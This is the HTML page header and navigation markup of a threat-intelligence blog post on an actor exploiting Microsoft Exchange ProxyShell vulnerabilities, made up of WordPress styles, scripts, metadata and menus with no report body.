<!doctype html> <html lang="en-US"> <head> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width"> <link rel="profile" href="https://gmpg.org/xfn/11"> <title>PHOSPHORUS Automates Initial Access Using ProxyShell – The DFIR Report</title> <meta name='robots' content='max-image-preview:large' /> <style>img:is([sizes="auto" i], [sizes^="auto," i]) { contain-intrinsic-size: 3000px 1500px }</style> <link rel='dns-prefetch' href='//stats.wp.com' /> <link rel='preconnect' href='//c0.wp.com' /> <link rel="alternate" type="application/rss+xml" title="The DFIR Report » Feed" href="https://thedfirreport.com/feed/" /> <link rel="alternate" type="application/rss+xml" title="The DFIR Report » Comments Feed" href="https://thedfirreport.com/comments/feed/" /> <script type="text/javascript"> /* <![CDATA[ */ window._wpemojiSettings = {"baseUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/72x72\/","ext":".png","svgUrl":"https:\/\/s.w.org\/images\/core\/emoji\/15.0.3\/svg\/","svgExt":".svg","source":{"concatemoji":"https:\/\/thedfirreport.com\/wp-includes\/js\/wp-emoji-release.min.js?ver=6.7.2"}}; /*! 
This file is auto-generated */ !function(i,n){var o,s,e;function c(e){try{var t={supportTests:e,timestamp:(new Date).valueOf()};sessionStorage.setItem(o,JSON.stringify(t))}catch(e){}}function p(e,t,n){e.clearRect(0,0,e.canvas.width,e.canvas.height),e.fillText(t,0,0);var t=new Uint32Array(e.getImageData(0,0,e.canvas.width,e.canvas.height).data),r=(e.clearRect(0,0,e.canvas.width,e.canvas.height),e.fillText(n,0,0),new Uint32Array(e.getImageData(0,0,e.canvas.width,e.canvas.height).data));return t.every(function(e,t){return e===r[t]})}function u(e,t,n){switch(t){case"flag":return n(e,"\ud83c\udff3\ufe0f\u200d\u26a7\ufe0f","\ud83c\udff3\ufe0f\u200b\u26a7\ufe0f")?!1:!n(e,"\ud83c\uddfa\ud83c\uddf3","\ud83c\uddfa\u200b\ud83c\uddf3")&&!n(e,"\ud83c\udff4\udb40\udc67\udb40\udc62\udb40\udc65\udb40\udc6e\udb40\udc67\udb40\udc7f","\ud83c\udff4\u200b\udb40\udc67\u200b\udb40\udc62\u200b\udb40\udc65\u200b\udb40\udc6e\u200b\udb40\udc67\u200b\udb40\udc7f");case"emoji":return!n(e,"\ud83d\udc26\u200d\u2b1b","\ud83d\udc26\u200b\u2b1b")}return!1}function f(e,t,n){var r="undefined"!=typeof WorkerGlobalScope&&self instanceof WorkerGlobalScope?new OffscreenCanvas(300,150):i.createElement("canvas"),a=r.getContext("2d",{willReadFrequently:!0}),o=(a.textBaseline="top",a.font="600 32px Arial",{});return e.forEach(function(e){o[e]=t(a,e,n)}),o}function t(e){var t=i.createElement("script");t.src=e,t.defer=!0,i.head.appendChild(t)}"undefined"!=typeof Promise&&(o="wpEmojiSettingsSupports",s=["flag","emoji"],n.supports={everything:!0,everythingExceptFlag:!0},e=new Promise(function(e){i.addEventListener("DOMContentLoaded",e,{once:!0})}),new Promise(function(t){var n=function(){try{var e=JSON.parse(sessionStorage.getItem(o));if("object"==typeof e&&"number"==typeof e.timestamp&&(new Date).valueOf()<e.timestamp+604800&&"object"==typeof e.supportTests)return e.supportTests}catch(e){}return null}();if(!n){if("undefined"!=typeof Worker&&"undefined"!=typeof OffscreenCanvas&&"undefined"!=typeof 
URL&&URL.createObjectURL&&"undefined"!=typeof Blob)try{var e="postMessage("+f.toString()+"("+[JSON.stringify(s),u.toString(),p.toString()].join(",")+"));",r=new Blob([e],{type:"text/javascript"}),a=new Worker(URL.createObjectURL(r),{name:"wpTestEmojiSupports"});return void(a.onmessage=function(e){c(n=e.data),a.terminate(),t(n)})}catch(e){}c(n=f(s,u,p))}t(n)}).then(function(e){for(var t in e)n.supports[t]=e[t],n.supports.everything=n.supports.everything&&n.supports[t],"flag"!==t&&(n.supports.everythingExceptFlag=n.supports.everythingExceptFlag&&n.supports[t]);n.supports.everythingExceptFlag=n.supports.everythingExceptFlag&&!n.supports.flag,n.DOMReady=!1,n.readyCallback=function(){n.DOMReady=!0}}).then(function(){return e}).then(function(){var e;n.supports.everything||(n.readyCallback(),(e=n.source||{}).concatemoji?t(e.concatemoji):e.wpemoji&&e.twemoji&&(t(e.twemoji),t(e.wpemoji)))}))}((window,document),window._wpemojiSettings); /* ]]> */ </script> <link rel='stylesheet' id='jetpack_related-posts-css' href='https://c0.wp.com/p/jetpack/14.3/modules/related-posts/related-posts.css' type='text/css' media='all' /> <style id='wp-emoji-styles-inline-css' type='text/css'> img.wp-smiley, img.emoji { display: inline !important; border: none !important; box-shadow: none !important; height: 1em !important; width: 1em !important; margin: 0 0.07em !important; vertical-align: -0.1em !important; background: none !important; padding: 0 !important; } </style> <link rel='stylesheet' id='wp-block-library-css' href='https://c0.wp.com/c/6.7.2/wp-includes/css/dist/block-library/style.min.css' type='text/css' media='all' /> <link rel='stylesheet' id='mediaelement-css' href='https://c0.wp.com/c/6.7.2/wp-includes/js/mediaelement/mediaelementplayer-legacy.min.css' type='text/css' media='all' /> <link rel='stylesheet' id='wp-mediaelement-css' href='https://c0.wp.com/c/6.7.2/wp-includes/js/mediaelement/wp-mediaelement.min.css' type='text/css' media='all' /> <style 
id='jetpack-sharing-buttons-style-inline-css' type='text/css'> .jetpack-sharing-buttons__services-list{display:flex;flex-direction:row;flex-wrap:wrap;gap:0;list-style-type:none;margin:5px;padding:0}.jetpack-sharing-buttons__services-list.has-small-icon-size{font-size:12px}.jetpack-sharing-buttons__services-list.has-normal-icon-size{font-size:16px}.jetpack-sharing-buttons__services-list.has-large-icon-size{font-size:24px}.jetpack-sharing-buttons__services-list.has-huge-icon-size{font-size:36px}@media print{.jetpack-sharing-buttons__services-list{display:none!important}}.editor-styles-wrapper .wp-block-jetpack-sharing-buttons{gap:0;padding-inline-start:0}ul.jetpack-sharing-buttons__services-list.has-background{padding:1.25em 2.375em} </style> <style id='classic-theme-styles-inline-css' type='text/css'> /*! This file is auto-generated */ .wp-block-button__link{color:#fff;background-color:#32373c;border-radius:9999px;box-shadow:none;text-decoration:none;padding:calc(.667em + 2px) calc(1.333em + 2px);font-size:1.125em}.wp-block-file__button{background:#32373c;color:#fff;text-decoration:none} </style> <style id='global-styles-inline-css' type='text/css'> :root{--wp--preset--aspect-ratio--square: 1;--wp--preset--aspect-ratio--4-3: 4/3;--wp--preset--aspect-ratio--3-4: 3/4;--wp--preset--aspect-ratio--3-2: 3/2;--wp--preset--aspect-ratio--2-3: 2/3;--wp--preset--aspect-ratio--16-9: 16/9;--wp--preset--aspect-ratio--9-16: 9/16;--wp--preset--color--black: #000000;--wp--preset--color--cyan-bluish-gray: #abb8c3;--wp--preset--color--white: #ffffff;--wp--preset--color--pale-pink: #f78da7;--wp--preset--color--vivid-red: #cf2e2e;--wp--preset--color--luminous-vivid-orange: #ff6900;--wp--preset--color--luminous-vivid-amber: #fcb900;--wp--preset--color--light-green-cyan: #7bdcb5;--wp--preset--color--vivid-green-cyan: #00d084;--wp--preset--color--pale-cyan-blue: #8ed1fc;--wp--preset--color--vivid-cyan-blue: #0693e3;--wp--preset--color--vivid-purple: 
#9b51e0;--wp--preset--gradient--vivid-cyan-blue-to-vivid-purple: linear-gradient(135deg,rgba(6,147,227,1) 0%,rgb(155,81,224) 100%);--wp--preset--gradient--light-green-cyan-to-vivid-green-cyan: linear-gradient(135deg,rgb(122,220,180) 0%,rgb(0,208,130) 100%);--wp--preset--gradient--luminous-vivid-amber-to-luminous-vivid-orange: linear-gradient(135deg,rgba(252,185,0,1) 0%,rgba(255,105,0,1) 100%);--wp--preset--gradient--luminous-vivid-orange-to-vivid-red: linear-gradient(135deg,rgba(255,105,0,1) 0%,rgb(207,46,46) 100%);--wp--preset--gradient--very-light-gray-to-cyan-bluish-gray: linear-gradient(135deg,rgb(238,238,238) 0%,rgb(169,184,195) 100%);--wp--preset--gradient--cool-to-warm-spectrum: linear-gradient(135deg,rgb(74,234,220) 0%,rgb(151,120,209) 20%,rgb(207,42,186) 40%,rgb(238,44,130) 60%,rgb(251,105,98) 80%,rgb(254,248,76) 100%);--wp--preset--gradient--blush-light-purple: linear-gradient(135deg,rgb(255,206,236) 0%,rgb(152,150,240) 100%);--wp--preset--gradient--blush-bordeaux: linear-gradient(135deg,rgb(254,205,165) 0%,rgb(254,45,45) 50%,rgb(107,0,62) 100%);--wp--preset--gradient--luminous-dusk: linear-gradient(135deg,rgb(255,203,112) 0%,rgb(199,81,192) 50%,rgb(65,88,208) 100%);--wp--preset--gradient--pale-ocean: linear-gradient(135deg,rgb(255,245,203) 0%,rgb(182,227,212) 50%,rgb(51,167,181) 100%);--wp--preset--gradient--electric-grass: linear-gradient(135deg,rgb(202,248,128) 0%,rgb(113,206,126) 100%);--wp--preset--gradient--midnight: linear-gradient(135deg,rgb(2,3,129) 0%,rgb(40,116,252) 100%);--wp--preset--font-size--small: 13px;--wp--preset--font-size--medium: 20px;--wp--preset--font-size--large: 36px;--wp--preset--font-size--x-large: 42px;--wp--preset--spacing--20: 0.44rem;--wp--preset--spacing--30: 0.67rem;--wp--preset--spacing--40: 1rem;--wp--preset--spacing--50: 1.5rem;--wp--preset--spacing--60: 2.25rem;--wp--preset--spacing--70: 3.38rem;--wp--preset--spacing--80: 5.06rem;--wp--preset--shadow--natural: 6px 6px 9px rgba(0, 0, 0, 0.2);--wp--preset--shadow--deep: 
12px 12px 50px rgba(0, 0, 0, 0.4);--wp--preset--shadow--sharp: 6px 6px 0px rgba(0, 0, 0, 0.2);--wp--preset--shadow--outlined: 6px 6px 0px -3px rgba(255, 255, 255, 1), 6px 6px rgba(0, 0, 0, 1);--wp--preset--shadow--crisp: 6px 6px 0px rgba(0, 0, 0, 1);}:where(.is-layout-flex){gap: 0.5em;}:where(.is-layout-grid){gap: 0.5em;}body .is-layout-flex{display: flex;}.is-layout-flex{flex-wrap: wrap;align-items: center;}.is-layout-flex > :is(*, div){margin: 0;}body .is-layout-grid{display: grid;}.is-layout-grid > :is(*, div){margin: 0;}:where(.wp-block-columns.is-layout-flex){gap: 2em;}:where(.wp-block-columns.is-layout-grid){gap: 2em;}:where(.wp-block-post-template.is-layout-flex){gap: 1.25em;}:where(.wp-block-post-template.is-layout-grid){gap: 1.25em;}.has-black-color{color: var(--wp--preset--color--black) !important;}.has-cyan-bluish-gray-color{color: var(--wp--preset--color--cyan-bluish-gray) !important;}.has-white-color{color: var(--wp--preset--color--white) !important;}.has-pale-pink-color{color: var(--wp--preset--color--pale-pink) !important;}.has-vivid-red-color{color: var(--wp--preset--color--vivid-red) !important;}.has-luminous-vivid-orange-color{color: var(--wp--preset--color--luminous-vivid-orange) !important;}.has-luminous-vivid-amber-color{color: var(--wp--preset--color--luminous-vivid-amber) !important;}.has-light-green-cyan-color{color: var(--wp--preset--color--light-green-cyan) !important;}.has-vivid-green-cyan-color{color: var(--wp--preset--color--vivid-green-cyan) !important;}.has-pale-cyan-blue-color{color: var(--wp--preset--color--pale-cyan-blue) !important;}.has-vivid-cyan-blue-color{color: var(--wp--preset--color--vivid-cyan-blue) !important;}.has-vivid-purple-color{color: var(--wp--preset--color--vivid-purple) !important;}.has-black-background-color{background-color: var(--wp--preset--color--black) !important;}.has-cyan-bluish-gray-background-color{background-color: var(--wp--preset--color--cyan-bluish-gray) 
!important;}.has-white-background-color{background-color: var(--wp--preset--color--white) !important;}.has-pale-pink-background-color{background-color: var(--wp--preset--color--pale-pink) !important;}.has-vivid-red-background-color{background-color: var(--wp--preset--color--vivid-red) !important;}.has-luminous-vivid-orange-background-color{background-color: var(--wp--preset--color--luminous-vivid-orange) !important;}.has-luminous-vivid-amber-background-color{background-color: var(--wp--preset--color--luminous-vivid-amber) !important;}.has-light-green-cyan-background-color{background-color: var(--wp--preset--color--light-green-cyan) !important;}.has-vivid-green-cyan-background-color{background-color: var(--wp--preset--color--vivid-green-cyan) !important;}.has-pale-cyan-blue-background-color{background-color: var(--wp--preset--color--pale-cyan-blue) !important;}.has-vivid-cyan-blue-background-color{background-color: var(--wp--preset--color--vivid-cyan-blue) !important;}.has-vivid-purple-background-color{background-color: var(--wp--preset--color--vivid-purple) !important;}.has-black-border-color{border-color: var(--wp--preset--color--black) !important;}.has-cyan-bluish-gray-border-color{border-color: var(--wp--preset--color--cyan-bluish-gray) !important;}.has-white-border-color{border-color: var(--wp--preset--color--white) !important;}.has-pale-pink-border-color{border-color: var(--wp--preset--color--pale-pink) !important;}.has-vivid-red-border-color{border-color: var(--wp--preset--color--vivid-red) !important;}.has-luminous-vivid-orange-border-color{border-color: var(--wp--preset--color--luminous-vivid-orange) !important;}.has-luminous-vivid-amber-border-color{border-color: var(--wp--preset--color--luminous-vivid-amber) !important;}.has-light-green-cyan-border-color{border-color: var(--wp--preset--color--light-green-cyan) !important;}.has-vivid-green-cyan-border-color{border-color: var(--wp--preset--color--vivid-green-cyan) 
!important;}.has-pale-cyan-blue-border-color{border-color: var(--wp--preset--color--pale-cyan-blue) !important;}.has-vivid-cyan-blue-border-color{border-color: var(--wp--preset--color--vivid-cyan-blue) !important;}.has-vivid-purple-border-color{border-color: var(--wp--preset--color--vivid-purple) !important;}.has-vivid-cyan-blue-to-vivid-purple-gradient-background{background: var(--wp--preset--gradient--vivid-cyan-blue-to-vivid-purple) !important;}.has-light-green-cyan-to-vivid-green-cyan-gradient-background{background: var(--wp--preset--gradient--light-green-cyan-to-vivid-green-cyan) !important;}.has-luminous-vivid-amber-to-luminous-vivid-orange-gradient-background{background: var(--wp--preset--gradient--luminous-vivid-amber-to-luminous-vivid-orange) !important;}.has-luminous-vivid-orange-to-vivid-red-gradient-background{background: var(--wp--preset--gradient--luminous-vivid-orange-to-vivid-red) !important;}.has-very-light-gray-to-cyan-bluish-gray-gradient-background{background: var(--wp--preset--gradient--very-light-gray-to-cyan-bluish-gray) !important;}.has-cool-to-warm-spectrum-gradient-background{background: var(--wp--preset--gradient--cool-to-warm-spectrum) !important;}.has-blush-light-purple-gradient-background{background: var(--wp--preset--gradient--blush-light-purple) !important;}.has-blush-bordeaux-gradient-background{background: var(--wp--preset--gradient--blush-bordeaux) !important;}.has-luminous-dusk-gradient-background{background: var(--wp--preset--gradient--luminous-dusk) !important;}.has-pale-ocean-gradient-background{background: var(--wp--preset--gradient--pale-ocean) !important;}.has-electric-grass-gradient-background{background: var(--wp--preset--gradient--electric-grass) !important;}.has-midnight-gradient-background{background: var(--wp--preset--gradient--midnight) !important;}.has-small-font-size{font-size: var(--wp--preset--font-size--small) !important;}.has-medium-font-size{font-size: var(--wp--preset--font-size--medium) 
!important;}.has-large-font-size{font-size: var(--wp--preset--font-size--large) !important;}.has-x-large-font-size{font-size: var(--wp--preset--font-size--x-large) !important;} :where(.wp-block-post-template.is-layout-flex){gap: 1.25em;}:where(.wp-block-post-template.is-layout-grid){gap: 1.25em;} :where(.wp-block-columns.is-layout-flex){gap: 2em;}:where(.wp-block-columns.is-layout-grid){gap: 2em;} :root :where(.wp-block-pullquote){font-size: 1.5em;line-height: 1.6;} </style> <link rel='stylesheet' id='freenews-style-css' href='https://thedfirreport.com/wp-content/themes/freenews/style.css?ver=6.7.2' type='text/css' media='all' /> <style id='freenews-style-inline-css' type='text/css'> .tags-links, .byline, .comments-link { clip: rect(1px, 1px, 1px, 1px); height: 1px; position: absolute; overflow: hidden; width: 1px; } </style> <link rel='stylesheet' id='font-awesome-css' href='https://thedfirreport.com/wp-content/themes/freenews/assets/library/fontawesome/css/all.min.css?ver=6.7.2' type='text/css' media='all' /> <link rel='stylesheet' id='freenews-google-fonts-css' href='https://thedfirreport.com/wp-content/fonts/d92fef3d9e5de6f7993b11046e265436.css' type='text/css' media='all' /> <link rel='stylesheet' id='sharedaddy-css' href='https://c0.wp.com/p/jetpack/14.3/modules/sharedaddy/sharing.css' type='text/css' media='all' /> <link rel='stylesheet' id='social-logos-css' href='https://c0.wp.com/p/jetpack/14.3/_inc/social-logos/social-logos.min.css' type='text/css' media='all' /> <script type="text/javascript" id="jetpack_related-posts-js-extra"> /* <![CDATA[ */ var related_posts_js_options = {"post_heading":"h4"}; /* ]]> */ </script> <script type="text/javascript" src="https://c0.wp.com/p/jetpack/14.3/_inc/build/related-posts/related-posts.min.js" id="jetpack_related-posts-js"></script> <script type="text/javascript" src="https://c0.wp.com/c/6.7.2/wp-includes/js/jquery/jquery.min.js" id="jquery-core-js"></script> <script type="text/javascript" 
src="https://c0.wp.com/c/6.7.2/wp-includes/js/jquery/jquery-migrate.min.js" id="jquery-migrate-js"></script> <script type="text/javascript" src="https://thedfirreport.com/wp-content/themes/freenews/assets/js/global.js?ver=1" id="freenews-global-js"></script> <link rel="https://api.w.org/" href="https://thedfirreport.com/wp-json/" /><link rel="alternate" title="JSON" type="application/json" href="https://thedfirreport.com/wp-json/wp/v2/posts/5981" /><link rel="EditURI" type="application/rsd+xml" title="RSD" href="https://thedfirreport.com/xmlrpc.php?rsd" /> <meta name="generator" content="WordPress 6.7.2" /> <link rel="canonical" href="https://thedfirreport.com/2022/03/21/phosphorus-automates-initial-access-using-proxyshell/" /> <link rel='shortlink' href='https://thedfirreport.com/?p=5981' /> <link rel="alternate" title="oEmbed (JSON)" type="application/json+oembed" href="https://thedfirreport.com/wp-json/oembed/1.0/embed?url=https%3A%2F%2Fthedfirreport.com%2F2022%2F03%2F21%2Fphosphorus-automates-initial-access-using-proxyshell%2F" /> <link rel="alternate" title="oEmbed (XML)" type="text/xml+oembed" href="https://thedfirreport.com/wp-json/oembed/1.0/embed?url=https%3A%2F%2Fthedfirreport.com%2F2022%2F03%2F21%2Fphosphorus-automates-initial-access-using-proxyshell%2F&format=xml" /> <!-- GA Google Analytics @ https://m0n.co/ga --> <script async src="https://www.googletagmanager.com/gtag/js?id=UA-162747485-1"></script> <script> window.dataLayer = window.dataLayer || []; function gtag(){dataLayer.push(arguments);} gtag('js', new Date()); gtag('config', 'UA-162747485-1'); </script> <script type="text/javascript"> (function(url){ if(/(?:Chrome\/26\.0\.1410\.63 Safari\/537\.31|WordfenceTestMonBot)/.test(navigator.userAgent)){ return; } var addEvent = function(evt, handler) { if (window.addEventListener) { document.addEventListener(evt, handler, false); } else if (window.attachEvent) { document.attachEvent('on' + evt, handler); } }; var removeEvent = function(evt, handler) { 
if (window.removeEventListener) { document.removeEventListener(evt, handler, false); } else if (window.detachEvent) { document.detachEvent('on' + evt, handler); } }; var evts = 'contextmenu dblclick drag dragend dragenter dragleave dragover dragstart drop keydown keypress keyup mousedown mousemove mouseout mouseover mouseup mousewheel scroll'.split(' '); var logHuman = function() { if (window.wfLogHumanRan) { return; } window.wfLogHumanRan = true; var wfscr = document.createElement('script'); wfscr.type = 'text/javascript'; wfscr.async = true; wfscr.src = url + '&r=' + Math.random(); (document.getElementsByTagName('head')[0]||document.getElementsByTagName('body')[0]).appendChild(wfscr); for (var i = 0; i < evts.length; i++) { removeEvent(evts[i], logHuman); } }; for (var i = 0; i < evts.length; i++) { addEvent(evts[i], logHuman); } })('//thedfirreport.com/?wordfence_lh=1&hid=683037B30A4672A35B0AC099FE9BA9A6'); </script> <style>img#wpstats{display:none}</style> <style type="text/css" id="custom-background-css"> body.custom-background { background-color: #f8f8f8; } </style> <!-- Jetpack Open Graph Tags --> <meta property="og:type" content="article" /> <meta property="og:title" content="PHOSPHORUS Automates Initial Access Using ProxyShell" /> <meta property="og:url" content="https://thedfirreport.com/2022/03/21/phosphorus-automates-initial-access-using-proxyshell/" /> <meta property="og:description" content="In December 2021, we observed an adversary exploiting the Microsoft Exchange ProxyShell vulnerabilities to gain initial access and execute code via multiple web shells. 
The overlap of activities an…" /> <meta property="article:published_time" content="2022-03-21T01:55:06+00:00" /> <meta property="article:modified_time" content="2022-12-10T13:37:33+00:00" /> <meta property="og:site_name" content="The DFIR Report" /> <meta property="og:image" content="https://thedfirreport.com/wp-content/uploads/2022/03/ProxyShell-Exploit-Process-Chain.png" /> <meta property="og:image:width" content="1673" /> <meta property="og:image:height" content="1447" /> <meta property="og:image:alt" content="" /> <meta property="og:locale" content="en_US" /> <meta name="twitter:text:title" content="PHOSPHORUS Automates Initial Access Using ProxyShell" /> <meta name="twitter:image" content="https://thedfirreport.com/wp-content/uploads/2022/03/ProxyShell-Exploit-Process-Chain.png?w=640" /> <meta name="twitter:card" content="summary_large_image" /> <!-- End Jetpack Open Graph Tags --> <link rel="icon" href="https://thedfirreport.com/wp-content/uploads/2020/04/cropped-dfir-v1-w-32x32.png" sizes="32x32" /> <link rel="icon" href="https://thedfirreport.com/wp-content/uploads/2020/04/cropped-dfir-v1-w-192x192.png" sizes="192x192" /> <link rel="apple-touch-icon" href="https://thedfirreport.com/wp-content/uploads/2020/04/cropped-dfir-v1-w-180x180.png" /> <meta name="msapplication-TileImage" content="https://thedfirreport.com/wp-content/uploads/2020/04/cropped-dfir-v1-w-270x270.png" /> </head> <body class="post-template-default single single-post postid-5981 single-format-standard custom-background has-sidebar tags-hidden author-hidden comment-hidden"> <div id="page" class="site"> <a class="skip-link screen-reader-text" href="#content">Skip to content</a> <header id="masthead" class="site-header"> <div id="main-header" class="main-header"> <div class="navigation-top"> <div class="wrap"> <div id="site-header-menu" class="site-header-menu"> <nav class="main-navigation" aria-label="Primary Menu" role="navigation"> <button class="menu-toggle" aria-controls="primary-menu" 
aria-expanded="false"> <span class="toggle-text">Menu</span> <span class="toggle-bar"></span> </button> <ul id="primary-menu" class="menu nav-menu"><li id="menu-item-21337" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-home menu-item-21337"><a href="https://thedfirreport.com/">Reports</a></li> <li id="menu-item-21314" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-21314"><a href="https://thedfirreport.com/analysts/">Analysts</a></li> <li id="menu-item-21315" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-has-children menu-item-21315"><a href="https://thedfirreport.com/services/">Services</a> <ul class="sub-menu"> <li id="menu-item-21319" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-21319"><a href="https://thedfirreport.com/services/threat-intelligence/">Threat Intelligence</a></li> <li id="menu-item-21318" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-21318"><a href="https://thedfirreport.com/services/detection-rules/">Detection Rules</a></li> <li id="menu-item-31055" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-has-children menu-item-31055"><a href="https://thedfirreport.com/services/dfir-labs/">DFIR Labs</a> <ul class="sub-menu"> <li id="menu-item-35456" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-35456"><a href="https://thedfirreport.com/services/dfir-labs/ctf/">Capture The Flag (CTF)</a></li> <li id="menu-item-32606" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-32606"><a href="https://thedfirreport.com/services/dfir-labs/dfir-labs-leaderboard/">Leaderboard</a></li> <li id="menu-item-38108" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-38108"><a href="https://thedfirreport.com/services/dfir-labs/ctf-winners/">CTF Winners</a></li> </ul> </li> <li id="menu-item-21320" class="menu-item menu-item-type-post_type 
menu-item-object-page menu-item-21320"><a href="https://thedfirreport.com/services/case-artifacts/">Case Artifacts</a></li> <li id="menu-item-21317" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-has-children menu-item-21317"><a href="https://thedfirreport.com/services/mentoring-coaching-program/">Mentoring & Coaching Program</a> <ul class="sub-menu"> <li id="menu-item-21325" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-21325"><a href="https://thedfirreport.com/services/mentoring-coaching-program/book-a-session/">Book A Session</a></li> <li id="menu-item-21326" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-21326"><a href="https://thedfirreport.com/services/mentoring-coaching-program/meet-the-team/">Meet The Team</a></li> </ul> </li> </ul> </li> <li id="menu-item-31033" class="menu-item menu-item-type-custom menu-item-object-custom menu-item-31033"><a href="https://store.thedfirreport.com/collections/dfir-labs">Access DFIR Labs</a></li> <li id="menu-item-21313" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-21313"><a href="https://thedfirreport.com/subscribe/">Subscribe</a></li> <li id="menu-item-21316" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-21316"><a href="https://thedfirreport.com/contact/">Contact Us</a></li> </ul> </nav><!-- #site-navigation --> </div> </div><!-- .wrap --> </div><!-- .navigation-top --> <nav class="secondary-navigation" role="navigation" aria-label="Secondary Navigation"> <div class="wrap"> <button class="secondary-menu-toggle" aria-controls="primary-menu" aria-expanded="false"> <span class="secondary-toggle-text">Menu</span> <span class="secondary-toggle-bar"></span> </button> <ul id="primary-menu" class="secondary-menu"><li id="menu-item-21323" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-21323"><a href="https://thedfirreport.com/services/threat-intelligence/">Threat 
Intelligence</a></li> <li id="menu-item-21322" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-21322"><a href="https://thedfirreport.com/services/detection-rules/">Detection Rules</a></li> <li id="menu-item-31037" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-has-children menu-item-31037"><a href="https://thedfirreport.com/services/dfir-labs/">DFIR Labs</a> <ul class="sub-menu"> <li id="menu-item-35457" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-35457"><a href="https://thedfirreport.com/services/dfir-labs/ctf/">Capture The Flag (CTF)</a></li> <li id="menu-item-32608" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-32608"><a href="https://thedfirreport.com/services/dfir-labs/dfir-labs-leaderboard/">Leaderboard</a></li> <li id="menu-item-38110" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-38110"><a href="https://thedfirreport.com/services/dfir-labs/ctf-winners/">CTF Winners</a></li> </ul> </li> <li id="menu-item-21321" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-has-children menu-item-21321"><a href="https://thedfirreport.com/services/mentoring-coaching-program/">Mentoring & Coaching Program</a> <ul class="sub-menu"> <li id="menu-item-21327" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-21327"><a href="https://thedfirreport.com/services/mentoring-coaching-program/book-a-session/">Book A Session</a></li> <li id="menu-item-21328" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-21328"><a href="https://thedfirreport.com/services/mentoring-coaching-program/meet-the-team/">Meet The Team</a></li> </ul> </li> <li id="menu-item-21324" class="menu-item menu-item-type-post_type menu-item-object-page menu-item-21324"><a href="https://thedfirreport.com/services/case-artifacts/">Case Artifacts</a></li> </ul> </div><!-- .wrap --> </nav><!-- .secondary-navigation 
--> <div class="main-header-brand"> <div class="header-brand"> <div class="wrap"> <div class="header-brand-content"> <div class="site-branding"> <div class="site-branding-text"> <p class="site-title"><a href="https://thedfirreport.com/" rel="home">The DFIR Report</a></p> <p class="site-description">Real Intrusions by Real Attackers, The Truth Behind the Intrusion</p> </div><!-- .site-branding-text --> </div><!-- .site-branding --> <div class="header-right"> <div class="header-banner"> </div><!-- .header-banner --> </div><!-- .header-right --> </div><!-- .header-brand-content --> </div><!-- .wrap --> </div><!-- .header-brand --> <div id="nav-sticker"> <div class="navigation-top"> <div class="wrap"> <div id="site-header-menu" class="site-header-menu"> <nav id="site-navigation" class="main-navigation" aria-label="Primary Menu"> <button class="menu-toggle" aria-controls="primary-menu" aria-expanded="false"> <span class="toggle-text">Menu</span> <span class="toggle-bar"></span> </button> <ul id="primary-menu" class="menu nav-menu"><li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-home menu-item-21337"><a href="https://thedfirreport.com/">Reports</a></li> <li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-21314"><a href="https://thedfirreport.com/analysts/">Analysts</a></li> <li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-has-children menu-item-21315"><a href="https://thedfirreport.com/services/">Services</a> <ul class="sub-menu"> <li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-21319"><a href="https://thedfirreport.com/services/threat-intelligence/">Threat Intelligence</a></li> <li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-21318"><a href="https://thedfirreport.com/services/detection-rules/">Detection Rules</a></li> <li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-has-children menu-item-31055"><a 
href="https://thedfirreport.com/services/dfir-labs/">DFIR Labs</a> <ul class="sub-menu"> <li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-35456"><a href="https://thedfirreport.com/services/dfir-labs/ctf/">Capture The Flag (CTF)</a></li> <li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-32606"><a href="https://thedfirreport.com/services/dfir-labs/dfir-labs-leaderboard/">Leaderboard</a></li> <li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-38108"><a href="https://thedfirreport.com/services/dfir-labs/ctf-winners/">CTF Winners</a></li> </ul> </li> <li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-21320"><a href="https://thedfirreport.com/services/case-artifacts/">Case Artifacts</a></li> <li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-has-children menu-item-21317"><a href="https://thedfirreport.com/services/mentoring-coaching-program/">Mentoring & Coaching Program</a> <ul class="sub-menu"> <li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-21325"><a href="https://thedfirreport.com/services/mentoring-coaching-program/book-a-session/">Book A Session</a></li> <li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-21326"><a href="https://thedfirreport.com/services/mentoring-coaching-program/meet-the-team/">Meet The Team</a></li> </ul> </li> </ul> </li> <li class="menu-item menu-item-type-custom menu-item-object-custom menu-item-31033"><a href="https://store.thedfirreport.com/collections/dfir-labs">Access DFIR Labs</a></li> <li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-21313"><a href="https://thedfirreport.com/subscribe/">Subscribe</a></li> <li class="menu-item menu-item-type-post_type menu-item-object-page menu-item-21316"><a href="https://thedfirreport.com/contact/">Contact Us</a></li> </ul> </nav><!-- #site-navigation --> </div> </div><!-- .wrap --> 
